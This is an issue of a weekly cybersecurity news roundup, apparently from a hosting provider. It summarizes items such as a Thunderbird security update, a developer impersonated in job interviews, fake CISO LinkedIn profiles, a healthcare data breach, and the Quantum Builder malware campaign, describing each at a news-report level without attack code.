Weekly Axis Of Easy #266
Last Week’s Quote was “Be yourself; everyone else is already taken.” was by Oscar Wilde. Helene is our winner! Congrats!
This Week’s Quote: “Grab them by the balls and their hearts and minds will follow.” … by ???
THE RULES: No searching up the answer, must be posted at the bottom of this post, in the comments section.
The Prize: First person to post the correct answer gets their next domain or hosting renewal on us.
In this issue:
- Thunderbird receives a security update from Mozilla
- Software developer Connor Tumbleson reveals how someone attempted to land Upwork contracts by pretending to be him
- Scammers targeted Fortune 500s with Fake CISO LinkedIn profile
- Physician’s Business Office data theft impacts nearly 197,000 patients
- NCA chief says criminals are now adopting Pandemic cybercrime trends as their regular course of business
- Dark Web cybercriminals deliver Agent Tesla malware using Quantum Builder
- Supreme Court to hear lawsuits against Google, Twitter, Facebook
- Patches for high-severity vulnerabilities in Chrome 106
- Computer malware is infected with PowerPoint mouseover tricks
- Cybercrime against SMEs is on the rise, especially account takeover fraud
- The average attacker finds weaknesses in less than 10 hours
Mozilla has disclosed a critical vulnerability in their email client, Thunderbird. This critical security issue allows for a remote takeover of your machine in some cases.
To make sure you are protected, stop reading now and upgrade to the latest version.
On September 14, 2022, software developer Connor Tumbleson received a rather strange email from a man named Andrew. In this email, Andrew –a college student– kindly and very honestly told the developer that someone had hired him to pretend to be Mr. Tumbleson in a job interview. “A few days ago, this person named Maris [redacted] found me on GitHub and reached out and asked me to be his senior software engineer where my priorities will be communicating with clients.” read the email from the college junior.
A Word file was attached to the email as proof of the eerily scam. Mr. Tumbleson discovered that the document was a cheat sheet that someone would use to act like him. It contained Mr. Tumbleson’s educational background, work history, qualifications, and information about the company he was being interviewed for. The email address was the one used by Mr. Tumbleson, just with ‘2’ at the end, and the home address was of a house for sale in Tampa, Florida, where Mr. Tumbleson actually lives.
Since the cheat sheet contained information on the date and time of the interview and the URL, Mr. Tumbleson was able to enter the Zoom interview where the fake Connor would hopefully make his appearance. “I quickly explained to the client that I was the real Connor Tumbleson and had not applied for the job.” He later tried to explain what was happening, and that’s when the fake Connor joined the call.
“The gentleman of this company was frankly amazing and allowed me to change my name, turn off my video, tweak my avatar, and stay on the call.” Once admitted into the call, fake Connor’s self-introduction was a direct copy of the cheat sheet. Mr. Tumbleson, who couldn’t stand that someone was talking about the achievements he had built up so far, changed his display name to and went back and turned the camera on and interrupted and asked what they were doing. Then, the fake Connor immediately left the room.
Talking with the client, it turns out that the fake Connor applied through the business matching service Upwork. In this way, Upwork had a profile page for a Connor Tumbleson, who was not registered by Mr. Tumbleson himself.
It is unknown how many fake Connor Tumblesons have gotten jobs using Mr. Tumbleson’s career so far. Mr. Tumbleson said he is horrified that there are still attempts to recruit a fake Connor Tumbleson using his name, background, and achievements, and he plans to continue investigating.
Someone is creating fake LinkedIn profiles for Chief Information Security Officer (CISO) roles at some of the world’s largest corporations, and these fake profiles are confusing search engine results. Rich Mason, the former CISO at Fortune 500 firm Honeywell, began warning his colleagues on LinkedIn about the phony profiles earlier this week. “It’s interesting the downstream sources that repeat LinkedIn bogus content as truth,” Mason said. “This is dangerous, Apollo.io, Signalhire, and Cybersecurity Ventures.”
It’s still unclear who’s behind this network of fake CISOs or what their intentions may be. However, in august, security firm Mandiant told Bloomberg that hackers working for the North Korean government have been copying resumes and profiles from leading job listing platforms to land jobs at cryptocurrency firms.
KrebsOnSecurity reported that LinkedIn’s teams were actively working to take down fake accounts and that its automated systems were stopping 96% of fake accounts and 99.1% of spam and scam.
In this regard, Mason said LinkedIn needs to make it easier for employers to remove phony employee accounts and that they need to give employers less than two weeks to get these profiles taken down.
An attack on the Physician’s Business Office’s network (PBO) five months ago likely resulted in the theft of 196,573 patients’ personal information. The PBO organization is a West Virginia-based service that manages medical practices and administers healthcare policies.
PBO’s network environment was discovered to have unusual activity in April 2022, which triggered a security audit. An outside digital forensics and incident response firm was engaged to assist, which found that data had been accessed and potentially acquired without authorization.
PHI breaches affecting over 500 patients must be reported within 60 days of discovery under the Health Insurance Portability and Accountability Act. In its June 30 report, PBO explained its delay as the result of an “in-depth” review of the potentially affected data to identify the patients and providers.
The company attributed the delay to its coordination with providers and work “to collect current mailing addresses for all potentially impacted individuals.”
In addition to names and Social Security numbers, stolen data could include driver’s licenses, treatment details, diagnoses, contact information, disability codes, prescription information, and health insurance account information.
Following the incident, PBO implemented several measures to strengthen its information security and prevent a recurrence.
Cybercrime trends growing during the pandemic are now “business as usual” among offenders, says a senior investigator. The National Crime Agency (NCA) deputy director of investigations, Matt Horne, said there has been an increase in the use of crypto-assets to launder money since the Covid-19 outbreak.
In his address at the International Security Expo, which brings together the global security community at London’s Olympia, Mr. Horne stressed that law enforcement needs to pool its resources and focus on a whole-system, collaborative approach otherwise, it will “be left behind.”
NCA figures show there are 70,000 known nominals engaged in serious organized crime in the UK and 850,000 people posing a sexual risk to children.
Mr. Horne said that organized crime had adapted to a shifting landscape and was now increasing in scale and complexity. He added that law enforcement must be agile to identify and maximize technological opportunities and threats.
Researchers discovered a malware builder called Quantum Builder that is being used to deliver the Agent Tesla remote access trojan. Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar report this malware campaign features enhancements and “a shift towards LNK (Windows shortcut) files compared with similar attacks in the past.”
Quantum Builder, available for €189 a month on the dark web, generates malicious shortcut files, HTA, ISO, and PowerShell payloads to deliver next-stage malware to targeted machines.
This attack starts with spear-phishing emails containing GZIP archives that include shortcuts designed to launch remote HTML applications (HTAs) using PowerShell code. The phishing emails disguised as order confirmation messages from a Chinese lump and rock sugar supplier download and execute Agent Tesla malware.
Researchers said that threat actors use malware builders sold on the cybercrime marketplace to create malicious payloads in campaigns against various organizations.
The U.S. Supreme Court announced it will hear two cases against social media giants google/YouTube, Twitter and Facebook.
Social media companies are generally exempt from liability of what their users post online due to a law (section 230) that was passed in 1996. Section 230 allows social media allows companies to moderate content that violate their own standards as long as they’re acting in “good faith.”
The two cases being heard by the Supreme Court are from family members of people killed by Islamic State group terrorist attacks.
Nohemi Gonzalez, a 23 year old US citizen, studying in Paris was killed in November of 2015 along with 129 other people at a café.
The other case involves the killing of Jordanian citizen Nawras Alassaf in an Istanbul nightclub in 2017 where an Islamic State affiliated gunman killed 39 people.
The allegation is, these platforms helped the Islamic State grow due to the lack of enough moderation of their content.
Patches for high-severity vulnerabilities in Chrome 106
Computer malware is infected with PowerPoint mouseover tricks
Cybercrime against SMEs is on the rise, especially account takeover fraud
The average attacker finds weaknesses in less than 10 hours
Previously on #AxisOfEasy
If you missed the previous issues, they can be read online here:
- September 26th, 2022: Record-Breaking DDoS Attack With 25.3 Billion Requests
- September 19th, 2022: Four-Fifths Of Firms Have Been Impacted By Critical Cloud Security Incidents
- September 12th, 2022: Botnets In The Work From Home Era
- September 5th, 2022: Safety Alert For Thousands Of Tourist Planes As Flying Technology Could Be Hacked
- August 29th, 2022: PayPal Scam Uses Invoices Sent Through Their Website